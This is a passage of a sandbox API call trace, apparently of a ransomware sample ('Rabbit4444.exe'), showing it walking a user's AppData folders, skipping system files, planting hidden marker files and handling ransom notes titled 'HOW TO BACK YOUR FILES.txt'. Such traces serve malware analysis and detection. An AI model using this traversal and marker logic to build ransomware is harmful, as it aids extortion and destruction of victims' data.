(lpString1="AC", lpString2="ids.txt") returned -1 [0056.063] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0056.063] lstrcpyW (in: lpString1=0x130ebcc, lpString2="AC" | out: lpString1="AC") returned="AC" [0056.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0056.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9a) returned 0x120c90 [0056.063] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x121fe8 [0056.063] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d33caa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9c13db32, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0056.063] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.063] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.063] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0056.064] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0056.064] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0056.064] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0056.064] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0056.064] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0056.064] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0056.064] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0056.064] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0056.064] lstrcpyW (in: lpString1=0x130ebcc, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0056.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0056.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x118f48 [0056.064] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x122268 [0056.064] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d34378, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9c13db32, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0056.064] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.064] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.064] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0056.064] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0056.064] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0056.064] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0056.064] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0056.064] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0056.064] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0056.064] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0056.064] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0056.064] lstrcpyW (in: lpString1=0x130ebcc, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0056.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0056.064] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x123760 [0056.064] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x1222e8 [0056.064] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d34794, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9c13db32, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0056.064] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.064] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.064] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0056.064] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0056.064] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0056.064] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0056.065] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0056.065] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0056.065] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0056.065] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0056.065] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0056.065] lstrcpyW (in: lpString1=0x130ebcc, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0056.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0056.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x123818 [0056.065] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1220c8 [0056.065] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d34ce1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9c13db32, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0056.065] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.065] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.065] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0056.065] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0056.065] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0056.065] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0056.065] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0056.065] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0056.065] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0056.065] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0056.065] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0056.065] lstrcpyW (in: lpString1=0x130ebcc, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0056.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0056.065] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x1238d0 [0056.065] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221e8 | out: ListHead=0xf68b0, ListEntry=0x1221e8) returned 0x1222c8 [0056.065] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x713d778b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0056.065] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.065] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.065] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0056.065] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0056.065] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0056.065] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0056.065] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0056.066] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0056.066] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0056.066] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0056.066] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0056.066] lstrcpyW (in: lpString1=0x130ebcc, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0056.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0056.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa6) returned 0x117ec8 [0056.066] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1221e8 [0056.066] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77c3f1ef, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x77c3f1ef, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x77c3f1ef, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0056.066] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.066] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.066] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0056.066] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0056.066] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0056.066] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0056.066] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0056.066] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0056.066] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0056.066] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0056.066] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0056.066] lstrcpyW (in: lpString1=0x130ebcc, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0056.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0056.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x124250 [0056.066] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x122128 [0056.066] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2dc905d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9c13db32, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0056.066] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.066] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.066] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0056.066] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0056.066] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0056.066] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0056.066] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0056.066] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0056.067] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0056.067] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0056.067] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0056.067] lstrcpyW (in: lpString1=0x130ebcc, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0056.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0056.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118658 [0056.067] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x122148 [0056.067] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2dc905d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9c13db32, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0056.067] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0056.067] lstrcpyW (in: lpString1=0x130ebcc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.067] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.067] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.067] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.068] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.068] CloseHandle (hObject=0x278) returned 1 [0056.068] CloseHandle (hObject=0x27c) returned 1 [0056.068] GetCurrentThreadId () returned 0xd98 [0056.068] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0056.068] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState" [0056.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118658 | out: hHeap=0xe0000) returned 1 [0056.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0056.068] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState" [0056.068] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\" [0056.068] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0056.068] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.070] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.072] FlushFileBuffers (hFile=0x27c) returned 1 [0056.073] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.073] CloseHandle (hObject=0x27c) returned 1 [0056.074] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState") returned 83 [0056.074] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.074] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2dc905d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeabd1839, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0056.074] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.074] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.074] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.074] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.074] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2dc905d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeabd1839, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.074] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.074] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.074] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.074] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.074] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.074] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeabd1839, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeabd1839, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeabf77a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.074] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.074] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.074] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeabd1839, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeabd1839, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeabf77a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.074] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0056.074] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.074] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.075] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.075] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.075] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.075] CloseHandle (hObject=0x278) returned 1 [0056.075] CloseHandle (hObject=0x27c) returned 1 [0056.075] GetCurrentThreadId () returned 0xd98 [0056.075] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0056.075] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData" [0056.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124250 | out: hHeap=0xe0000) returned 1 [0056.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0056.075] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData" [0056.076] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\" [0056.076] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0056.076] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.077] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.080] FlushFileBuffers (hFile=0x27c) returned 1 [0056.080] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.081] CloseHandle (hObject=0x27c) returned 1 [0056.081] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData") returned 87 [0056.081] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.081] FindFirstFileW (in: 